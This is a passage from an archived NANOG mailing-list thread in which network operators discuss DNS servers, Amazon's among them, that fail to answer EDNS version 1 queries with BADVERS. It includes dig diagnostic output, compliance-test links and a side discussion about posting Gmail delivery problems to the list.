Aug 2016 17:33:27 -0500." References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> Message-ID: <20160826235310.4E9FD528F414@rock.dv.isc.org> In message , Josh Reynolds writes: > > Just looking at the RFC... > ----- > VERSION Indicates the implementation level of the setter. Full conformance > with this specification is indicated by version '0'. Requestors are > encouraged to set this to the lowest implemented level capable of > expressing a transaction, to minimise the responder and network load of > discovering the greatest common implementation level between requestor and > responder. A requestor's version numbering strategy MAY ideally be a > run-time configuration option. If a responder does not implement the > VERSION level of the request, then it MUST respond with RCODE=BADVERS. All > responses MUST be limited in format to the VERSION level of the request, > but the VERSION of each response SHOULD be the highest implementation level > of the responder. In this way, a requestor will learn the implementation > level of a responder as a side effect of every response, including error > responses and including RCODE=BADVERS. > ----- > What am I missing, based on your output? The servers do not RESPOND to EDNS version != 0 queries. The following sends a EDNS version 1 query and tells dig not to complete the EDNS version negotiation so you can see the BADVERS response. % dig lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa ;; global options: +cmd ;; connection timed out; no servers could be reached % A EDNS version 0 query to show reachability and that EDNS is supported. % dig lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1 ;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;lostoncampus.com.au. IN SOA ;; ANSWER SECTION: lostoncampus.com.au. 900 IN SOA ns-1222.awsdns-24.org. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;; AUTHORITY SECTION: lostoncampus.com.au. 172800 IN NS ns-1222.awsdns-24.org. lostoncampus.com.au. 172800 IN NS ns-1812.awsdns-34.co.uk. lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com. lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net. ;; Query time: 126 msec ;; SERVER: 205.251.195.156#53(205.251.195.156) ;; WHEN: Sat Aug 27 09:40:29 EST 2016 ;; MSG SIZE rcvd: 248 % What you should see is something like the following. Note the version field is zero (0) and the rcode (status) field is BADVERS. This response does show a protocol error: AD should not be set in this response as there is no authenticated data. % dig . @a.root-servers.net +edns=1 +noednsneg soa ; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=1 +noednsneg soa ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570 ;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 ;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1232 ;; Query time: 438 msec ;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30) ;; WHEN: Sat Aug 27 09:34:32 EST 2016 ;; MSG SIZE rcvd: 23 % Amazon are not alone here (about 20% of servers fail to respond to EDNS version 1 queries) but they are big player so they should be doing things correctly. See https://ednscomp.isc.org/compliance/alexa-report.html for others serving the Alexa top 1000 that get things wrong there are a lot of you out there. There are also reports for the bottom 1000, .GOV, .AU and the root zone at https://ednscomp.isc.org along with a online compliance checker so others can test their servers. You just need to name a zone and it will work out the rest or you can target individual servers even those not listed in the NS RRset. There is also a whole series of graphs showing failure trends for different EDNS compliance tests at https://ednscomp.isc.org/compliance/summary.html Mark > On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: > > > > > I'm curious. What are you trying to achieve by blocking EDNS version > > negotiation? Is it really too hard to return BADVERS to a EDNS > > query with version != 0 along with the version of EDNS you support > > in the version field? Are you deliberately trying to prevent the > > IETF from deciding to bump the EDNS version in the future? Do you > > have firewalls that have this behaviour hard coded? Do you even > > test for RFC compliance? > > > > Mark > > > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): dns=ok > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > > -- > > Mark Andrews, ISC > > 1 Seymour St., Dundas Valley, NSW 2117, Australia > > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > > > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From josh at kyneticwifi.com Fri Aug 26 23:54:32 2016 From: josh at kyneticwifi.com (Josh Reynolds) Date: Fri, 26 Aug 2016 18:54:32 -0500 Subject: Can someone from Amazon please answer. In-Reply-To: <20160826235310.4E9FD528F414@rock.dv.isc.org> References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> <20160826235310.4E9FD528F414@rock.dv.isc.org> Message-ID: Excellent info, thank you Mark. On Aug 26, 2016 6:53 PM, "Mark Andrews" wrote: > > In message mail.gmail.com>, Josh Reynolds writes: > > > > Just looking at the RFC... > > ----- > > VERSION Indicates the implementation level of the setter. Full > conformance > > with this specification is indicated by version '0'. Requestors are > > encouraged to set this to the lowest implemented level capable of > > expressing a transaction, to minimise the responder and network load of > > discovering the greatest common implementation level between requestor > and > > responder. A requestor's version numbering strategy MAY ideally be a > > run-time configuration option. If a responder does not implement the > > VERSION level of the request, then it MUST respond with RCODE=BADVERS. > All > > responses MUST be limited in format to the VERSION level of the request, > > but the VERSION of each response SHOULD be the highest implementation > level > > of the responder. In this way, a requestor will learn the implementation > > level of a responder as a side effect of every response, including error > > responses and including RCODE=BADVERS. > > ----- > > What am I missing, based on your output? > > The servers do not RESPOND to EDNS version != 0 queries. The following > sends a EDNS version 1 query and tells dig not to complete the EDNS version > negotiation so you can see the BADVERS response. > > % dig lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa > > ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=1 > +noednsneg soa > ;; global options: +cmd > ;; connection timed out; no servers could be reached > % > > A EDNS version 0 query to show reachability and that EDNS is supported. > > % dig lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa > > ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=0 > +noednsneg soa > ;; global options: +cmd > ;; Got answer: > ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224 > ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1 > ;; WARNING: recursion requested but not available > > ;; OPT PSEUDOSECTION: > ; EDNS: version: 0, flags:; udp: 4096 > ;; QUESTION SECTION: > ;lostoncampus.com.au. IN SOA > > ;; ANSWER SECTION: > lostoncampus.com.au. 900 IN SOA ns-1222.awsdns-24.org. > awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 > > ;; AUTHORITY SECTION: > lostoncampus.com.au. 172800 IN NS ns-1222.awsdns-24.org. > lostoncampus.com.au. 172800 IN NS ns-1812.awsdns-34.co.uk. > lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com. > lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net. > > ;; Query time: 126 msec > ;; SERVER: 205.251.195.156#53(205.251.195.156) > ;; WHEN: Sat Aug 27 09:40:29 EST 2016 > ;; MSG SIZE rcvd: 248 > > % > > What you should see is something like the following. Note the > version field is zero (0) and the rcode (status) field is BADVERS. > This response does show a protocol error: AD should not be set in > this response as there is no authenticated data. > > % dig . @a.root-servers.net +edns=1 +noednsneg soa > > ; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=1 +noednsneg soa > ;; global options: +cmd > ;; Got answer: > ;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570 > ;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 > ;; WARNING: recursion requested but not available > > ;; OPT PSEUDOSECTION: > ; EDNS: version: 0, flags:; udp: 1232 > ;; Query time: 438 msec > ;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30) > ;; WHEN: Sat Aug 27 09:34:32 EST 2016 > ;; MSG SIZE rcvd: 23 > > % > > Amazon are not alone here (about 20% of servers fail to respond to > EDNS version 1 queries) but they are big player so they should be > doing things correctly. See > https://ednscomp.isc.org/compliance/alexa-report.html for others > serving the Alexa top 1000 that get things wrong there are a lot > of you out there. There are also reports for the bottom 1000, .GOV, > .AU and the root zone at https://ednscomp.isc.org along with a > online compliance checker so others can test their servers. You > just need to name a zone and it will work out the rest or you can > target individual servers even those not listed in the NS RRset. > > There is also a whole series of graphs showing failure trends for > different EDNS compliance tests at > https://ednscomp.isc.org/compliance/summary.html > > Mark > > > On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: > > > > > > > > I'm curious. What are you trying to achieve by blocking EDNS version > > > negotiation? Is it really too hard to return BADVERS to a EDNS > > > query with version != 0 along with the version of EDNS you support > > > in the version field? Are you deliberately trying to prevent the > > > IETF from deciding to bump the EDNS version in the future? Do you > > > have firewalls that have this behaviour hard coded? Do you even > > > test for RFC compliance? > > > > > > Mark > > > > > > lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): > dns=ok > > > edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok > > > ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok > > > > > > -- > > > Mark Andrews, ISC > > > 1 Seymour St., Dundas Valley, NSW 2117, Australia > > > PHONE: +61 2 9871 4742 INTERNET: > marka at isc.org > > > > > > -- > Mark Andrews, ISC > 1 Seymour St., Dundas Valley, NSW 2117, Australia > PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > From jared at puck.nether.net Sat Aug 27 00:12:44 2016 From: jared at puck.nether.net (Jared Mauch) Date: Fri, 26 Aug 2016 20:12:44 -0400 Subject: Can someone from Amazon please answer. In-Reply-To: References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> <20160826235310.4E9FD528F414@rock.dv.isc.org> Message-ID: My personal favorite broken domain is New York State Thruway folks. https://ednscomp.isc.org/ednscomp/cb652bc112 If you ask for AAAA of www.thruway.ny.gov it is a CNAME to www.wip.thruway.ny.gov and that breaks a number of DNS servers and load balancers, eg: $ host -t aaaa www.wip.thruway.ny.gov ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, expected 2001:558:feed::1#53 ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, expected 2001:558:feed::1#53 Waiting for the timeouts to occur or trying to get a robust response via TCP is problematic at best. DNS works really well despite much of the damage from firewall vendors and ill informed consultants. - Jared > On Aug 26, 2016, at 7:54 PM, Josh Reynolds wrote: > > Excellent info, thank you Mark. > > On Aug 26, 2016 6:53 PM, "Mark Andrews" wrote: > >> >> In message > mail.gmail.com>, Josh Reynolds writes: >>> >>> Just looking at the RFC... >>> ----- >>> VERSION Indicates the implementation level of the setter. Full >> conformance >>> with this specification is indicated by version '0'. Requestors are >>> encouraged to set this to the lowest implemented level capable of >>> expressing a transaction, to minimise the responder and network load of >>> discovering the greatest common implementation level between requestor >> and >>> responder. A requestor's version numbering strategy MAY ideally be a >>> run-time configuration option. If a responder does not implement the >>> VERSION level of the request, then it MUST respond with RCODE=BADVERS. >> All >>> responses MUST be limited in format to the VERSION level of the request, >>> but the VERSION of each response SHOULD be the highest implementation >> level >>> of the responder. In this way, a requestor will learn the implementation >>> level of a responder as a side effect of every response, including error >>> responses and including RCODE=BADVERS. >>> ----- >>> What am I missing, based on your output? >> >> The servers do not RESPOND to EDNS version != 0 queries. The following >> sends a EDNS version 1 query and tells dig not to complete the EDNS version >> negotiation so you can see the BADVERS response. >> >> % dig lostoncampus.com.au. @205.251.195.156 +edns=1 +noednsneg soa >> >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=1 >> +noednsneg soa >> ;; global options: +cmd >> ;; connection timed out; no servers could be reached >> % >> >> A EDNS version 0 query to show reachability and that EDNS is supported. >> >> % dig lostoncampus.com.au. @205.251.195.156 +edns=0 +noednsneg soa >> >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 +edns=0 >> +noednsneg soa >> ;; global options: +cmd >> ;; Got answer: >> ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224 >> ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1 >> ;; WARNING: recursion requested but not available >> >> ;; OPT PSEUDOSECTION: >> ; EDNS: version: 0, flags:; udp: 4096 >> ;; QUESTION SECTION: >> ;lostoncampus.com.au. IN SOA >> >> ;; ANSWER SECTION: >> lostoncampus.com.au. 900 IN SOA ns-1222.awsdns-24.org. >> awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 >> >> ;; AUTHORITY SECTION: >> lostoncampus.com.au. 172800 IN NS ns-1222.awsdns-24.org. >> lostoncampus.com.au. 172800 IN NS ns-1812.awsdns-34.co.uk. >> lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com. >> lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net. >> >> ;; Query time: 126 msec >> ;; SERVER: 205.251.195.156#53(205.251.195.156) >> ;; WHEN: Sat Aug 27 09:40:29 EST 2016 >> ;; MSG SIZE rcvd: 248 >> >> % >> >> What you should see is something like the following. Note the >> version field is zero (0) and the rcode (status) field is BADVERS. >> This response does show a protocol error: AD should not be set in >> this response as there is no authenticated data. >> >> % dig . @a.root-servers.net +edns=1 +noednsneg soa >> >> ; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=1 +noednsneg soa >> ;; global options: +cmd >> ;; Got answer: >> ;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570 >> ;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 >> ;; WARNING: recursion requested but not available >> >> ;; OPT PSEUDOSECTION: >> ; EDNS: version: 0, flags:; udp: 1232 >> ;; Query time: 438 msec >> ;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30) >> ;; WHEN: Sat Aug 27 09:34:32 EST 2016 >> ;; MSG SIZE rcvd: 23 >> >> % >> >> Amazon are not alone here (about 20% of servers fail to respond to >> EDNS version 1 queries) but they are big player so they should be >> doing things correctly. See >> https://ednscomp.isc.org/compliance/alexa-report.html for others >> serving the Alexa top 1000 that get things wrong there are a lot >> of you out there. There are also reports for the bottom 1000, .GOV, >> .AU and the root zone at https://ednscomp.isc.org along with a >> online compliance checker so others can test their servers. You >> just need to name a zone and it will work out the rest or you can >> target individual servers even those not listed in the NS RRset. >> >> There is also a whole series of graphs showing failure trends for >> different EDNS compliance tests at >> https://ednscomp.isc.org/compliance/summary.html >> >> Mark >> >>> On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: >>> >>>> >>>> I'm curious. What are you trying to achieve by blocking EDNS version >>>> negotiation? Is it really too hard to return BADVERS to a EDNS >>>> query with version != 0 along with the version of EDNS you support >>>> in the version field? Are you deliberately trying to prevent the >>>> IETF from deciding to bump the EDNS version in the future? Do you >>>> have firewalls that have this behaviour hard coded? Do you even >>>> test for RFC compliance? >>>> >>>> Mark >>>> >>>> lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): >> dns=ok >>>> edns=ok edns1=timeout edns at 512=ok ednsopt=ok edns1opt=timeout do=ok >>>> ednsflags=ok optlist=ok,nsid,subnet signed=ok ednstcp=ok >>>> >>>> -- >>>> Mark Andrews, ISC >>>> 1 Seymour St., Dundas Valley, NSW 2117, Australia >>>> PHONE: +61 2 9871 4742 INTERNET: >> marka at isc.org >>>> >>> >> -- >> Mark Andrews, ISC >> 1 Seymour St., Dundas Valley, NSW 2117, Australia >> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org >> From johnl at iecc.com Sat Aug 27 01:25:42 2016 From: johnl at iecc.com (John Levine) Date: 27 Aug 2016 01:25:42 -0000 Subject: Why the internal network delays, Gmail? In-Reply-To: Message-ID: <20160827012542.43353.qmail@ary.lan> In article you write: >I was working within the limits of what I had available. Here's the subscription page for mailop. It's got about as odd a mix of people as nanog, ranging from people with single user linux machines to people who run some of the largest mail systems in the world, including Gmail: https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop R's, John From math at sizone.org Sat Aug 27 01:53:46 2016 From: math at sizone.org (Ken Chase) Date: Fri, 26 Aug 2016 21:53:46 -0400 Subject: Why the internal network delays, Gmail? In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: <20160827015346.GA32024@sizone.org> Im thankful Nate posted. Gmail isnt a small system that affects only a small percentage of people worldwide, and therefore a perfect candidate for a mail- specific list that many (and many nanoggers like me) arent part of, for lack of additional bandwidth in life. However, gmail not working (similar to 8.8.8.8/.4.4 or 4.2.2.2 not working) shouldnt be on a mail-only or dns-only ops list im not part of: when 8.8.8.8 doesnt work, the complaints appear as "is there a power failure at your datacentre?" to "my website is down!" - same deal with gmail, it's that big. While I cant say exactly what that cutoff line is for mail and dns issues being postable to nanog or not, I definitely know gmail is pretty much the top of the pile (for now). Thanks Nate! /kc On Fri, Aug 26, 2016 at 05:31:59PM -0600, Nate Metheny said: >I was working within the limits of what I had available. > >I apologize if people on the list consider a network and systems >administrator reaching out to peers for assistance with a particular >problem that is clearly network related is inappropriate for a network >operations group list that may or may not have Google or Google affiliated >employees or contractors on it. > >I will use more discretion in the future. > >-- >Sent from a phone. Please excuse the brevity of this message and any >typographical errors. > >On Aug 26, 2016 17:18, "Mark Foster" wrote: > >> Hi Mel, There's another mailing list called 'mailop' which is probably >> more appropriate for email related problems, than NANOG. >> >> And in response to Nate: >> >> I was in contact with Google and after some convincing and detailed header >>> information, they acknowledged that they are having internal MX issues and >>> assure me that they will deal with the issue promptly. >>> >>> Initially they did not even acknowledge that there was a problem, so it >>> took several tiers of support people to finally see the issue. >>> >>> I look forward to the ongoing exchanges on the list. >>> >> >> Useful to know, but John is right - as cited, working through Google's >> support process, got somewhere. >> Further exchanges on NANOG are probably inappropriate. A group like >> 'mailop' probably has a higher care factor, however. >> >> (I would also note that email delays that are demonstratably outside of >> your network (as headers will show) are very easily painted as something >> beyond your control, and the nature of email is very much 'best effort', so >> anyone playing the blame game needs a reality check. Just because email >> exchanges 'are often' near-instantaneous, does not mean they always will >> be.) >> >> >> Mark. >> >> >> >> On 27/08/2016 8:53 a.m., Mel Beckman wrote: >> >>> John, >>> >>> With all due respect, it's S.O.P. for Nanogen to ask the list if anyone >>> else is experiencing a particular problem with some carrier or another. So >>> Nate's question is totally appropriate for this list. I know I've solved >>> several problems by airing them here and getting insight from other list >>> members. >>> >>> -mel beckman >>> >>> *snip* >> -- Ken Chase - math at sizone.org Toronto Canada From marka at isc.org Sat Aug 27 02:36:36 2016 From: marka at isc.org (Mark Andrews) Date: Sat, 27 Aug 2016 12:36:36 +1000 Subject: Can someone from Amazon please answer. In-Reply-To: Your message of "Fri, 26 Aug 2016 20:12:44 -0400." References: <20160823233710.8DC3A5206AD7@rock.dv.isc.org> <20160826235310.4E9FD528F414@rock.dv.isc.org> Message-ID: <20160827023636.05DDA5294030@rock.dv.isc.org> In message , Jared Mauch writes: > My personal favorite broken domain is New York State Thruway folks. > > https://ednscomp.isc.org/ednscomp/cb652bc112 > > If you ask for AAAA of www.thruway.ny.gov it is a CNAME to = > www.wip.thruway.ny.gov and that > breaks a number of DNS servers and load balancers, eg: > > $ host -t aaaa www.wip.thruway.ny.gov > ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, = > expected 2001:558:feed::1#53 > ;; reply from unexpected source: 2001:558:100e:4:69:252:66:215#53, = > expected 2001:558:feed::1#53 > > Waiting for the timeouts to occur or trying to get a robust response via = > TCP is problematic at best. > > DNS works really well despite much of the damage from firewall vendors = > and ill informed consultants. > > - Jared Your tax payer dollars at work. It you are a resident of NY state go complain to your state representatives. Which bureaucrat signed off on the purchase of this piece of garbage. Load balancers need to answer all query types. % dig www.wip.thruway.ny.gov @lc1.thruway.ny.gov ; <<>> DiG 9.11.0rc1 <<>> www.wip.thruway.ny.gov @lc1.thruway.ny.gov ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59670 ;; flags: qr aa rd ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;www.wip.thruway.ny.gov. IN A ;; ANSWER SECTION: www.wip.thruway.ny.gov. 30 IN A 66.192.38.208 ;; Query time: 394 msec ;; SERVER: 161.11.122.60#53(161.11.122.60) ;; WHEN: Sat Aug 27 12:28:56 EST 2016 ;; MSG SIZE rcvd: 56 % dig www.wip.thruway.ny.gov @lc1.thruway.ny.gov aaaa ; <<>> DiG 9.11.0rc1 <<>> www.wip.thruway.ny.gov @lc1.thruway.ny.gov aaaa ;; global options: +cmd ;; connection timed out; no servers could be reached % > > > On Aug 26, 2016, at 7:54 PM, Josh Reynolds = > wrote: > >=20 > > Excellent info, thank you Mark. > >=20 > > On Aug 26, 2016 6:53 PM, "Mark Andrews" wrote: > >=20 > >>=20 > >> In message >> mail.gmail.com>, Josh Reynolds writes: > >>>=20 > >>> Just looking at the RFC... > >>> ----- > >>> VERSION Indicates the implementation level of the setter. Full > >> conformance > >>> with this specification is indicated by version '0'. Requestors are > >>> encouraged to set this to the lowest implemented level capable of > >>> expressing a transaction, to minimise the responder and network load = > of > >>> discovering the greatest common implementation level between = > requestor > >> and > >>> responder. A requestor's version numbering strategy MAY ideally be a > >>> run-time configuration option. If a responder does not implement the > >>> VERSION level of the request, then it MUST respond with = > RCODE=3DBADVERS. > >> All > >>> responses MUST be limited in format to the VERSION level of the = > request, > >>> but the VERSION of each response SHOULD be the highest = > implementation > >> level > >>> of the responder. In this way, a requestor will learn the = > implementation > >>> level of a responder as a side effect of every response, including = > error > >>> responses and including RCODE=3DBADVERS. > >>> ----- > >>> What am I missing, based on your output? > >>=20 > >> The servers do not RESPOND to EDNS version !=3D 0 queries. The = > following > >> sends a EDNS version 1 query and tells dig not to complete the EDNS = > version > >> negotiation so you can see the BADVERS response. > >>=20 > >> % dig lostoncampus.com.au. @205.251.195.156 +edns=3D1 +noednsneg soa > >>=20 > >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 = > +edns=3D1 > >> +noednsneg soa > >> ;; global options: +cmd > >> ;; connection timed out; no servers could be reached > >> % > >>=20 > >> A EDNS version 0 query to show reachability and that EDNS is = > supported. > >>=20 > >> % dig lostoncampus.com.au. @205.251.195.156 +edns=3D0 +noednsneg soa > >>=20 > >> ; <<>> DiG 9.11.0rc1 <<>> lostoncampus.com.au. @205.251.195.156 = > +edns=3D0 > >> +noednsneg soa > >> ;; global options: +cmd > >> ;; Got answer: > >> ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63224 > >> ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 1 > >> ;; WARNING: recursion requested but not available > >>=20 > >> ;; OPT PSEUDOSECTION: > >> ; EDNS: version: 0, flags:; udp: 4096 > >> ;; QUESTION SECTION: > >> ;lostoncampus.com.au. IN SOA > >>=20 > >> ;; ANSWER SECTION: > >> lostoncampus.com.au. 900 IN SOA = > ns-1222.awsdns-24.org. > >> awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 > >>=20 > >> ;; AUTHORITY SECTION: > >> lostoncampus.com.au. 172800 IN NS = > ns-1222.awsdns-24.org. > >> lostoncampus.com.au. 172800 IN NS = > ns-1812.awsdns-34.co.uk. > >> lostoncampus.com.au. 172800 IN NS ns-78.awsdns-09.com. > >> lostoncampus.com.au. 172800 IN NS ns-924.awsdns-51.net. > >>=20 > >> ;; Query time: 126 msec > >> ;; SERVER: 205.251.195.156#53(205.251.195.156) > >> ;; WHEN: Sat Aug 27 09:40:29 EST 2016 > >> ;; MSG SIZE rcvd: 248 > >>=20 > >> % > >>=20 > >> What you should see is something like the following. Note the > >> version field is zero (0) and the rcode (status) field is BADVERS. > >> This response does show a protocol error: AD should not be set in > >> this response as there is no authenticated data. > >>=20 > >> % dig . @a.root-servers.net +edns=3D1 +noednsneg soa > >>=20 > >> ; <<>> DiG 9.11.0rc1 <<>> . @a.root-servers.net +edns=3D1 +noednsneg = > soa > >> ;; global options: +cmd > >> ;; Got answer: > >> ;; ->>HEADER<<- opcode: QUERY, status: BADVERS, id: 22570 > >> ;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1 > >> ;; WARNING: recursion requested but not available > >>=20 > >> ;; OPT PSEUDOSECTION: > >> ; EDNS: version: 0, flags:; udp: 1232 > >> ;; Query time: 438 msec > >> ;; SERVER: 2001:503:ba3e::2:30#53(2001:503:ba3e::2:30) > >> ;; WHEN: Sat Aug 27 09:34:32 EST 2016 > >> ;; MSG SIZE rcvd: 23 > >>=20 > >> % > >>=20 > >> Amazon are not alone here (about 20% of servers fail to respond to > >> EDNS version 1 queries) but they are big player so they should be > >> doing things correctly. See > >> https://ednscomp.isc.org/compliance/alexa-report.html for others > >> serving the Alexa top 1000 that get things wrong there are a lot > >> of you out there. There are also reports for the bottom 1000, .GOV, > >> .AU and the root zone at https://ednscomp.isc.org along with a > >> online compliance checker so others can test their servers. You > >> just need to name a zone and it will work out the rest or you can > >> target individual servers even those not listed in the NS RRset. > >>=20 > >> There is also a whole series of graphs showing failure trends for > >> different EDNS compliance tests at > >> https://ednscomp.isc.org/compliance/summary.html > >>=20 > >> Mark > >>=20 > >>> On Aug 23, 2016 6:43 PM, "Mark Andrews" wrote: > >>>=20 > >>>>=20 > >>>> I'm curious. What are you trying to achieve by blocking EDNS = > version > >>>> negotiation? Is it really too hard to return BADVERS to a EDNS > >>>> query with version !=3D 0 along with the version of EDNS you = > support > >>>> in the version field? Are you deliberately trying to prevent the > >>>> IETF from deciding to bump the EDNS version in the future? Do you > >>>> have firewalls that have this behaviour hard coded? Do you even > >>>> test for RFC compliance? > >>>>=20 > >>>> Mark > >>>>=20 > >>>> lostoncampus.com.au. @205.251.195.156 (ns-924.awsdns-51.net.): = > dns=3Dok > >>>> edns=3Dok edns1=3Dtimeout edns at 512=3Dok ednsopt=3Dok = > edns1opt=3Dtimeout do=3Dok > >>>> ednsflags=3Dok optlist=3Dok,nsid,subnet signed=3Dok ednstcp=3Dok > >>>> lostoncampus.com.au. @205.251.192.78 (ns-78.awsdns-09.com.): dns=3Dok= > > >>>> edns=3Dok edns1=3Dtimeout edns at 512=3Dok ednsopt=3Dok = > edns1opt=3Dtimeout do=3Dok > >>>> ednsflags=3Dok optlist=3Dok,nsid,subnet signed=3Dok ednstcp=3Dok > >>>> lostoncampus.com.au. @205.251.196.198 (ns-1222.awsdns-24.org.): = > dns=3Dok > >>>> edns=3Dok edns1=3Dtimeout edns at 512=3Dok ednsopt=3Dok = > edns1opt=3Dtimeout do=3Dok > >>>> ednsflags=3Dok optlist=3Dok,nsid,subnet signed=3Dok ednstcp=3Dok 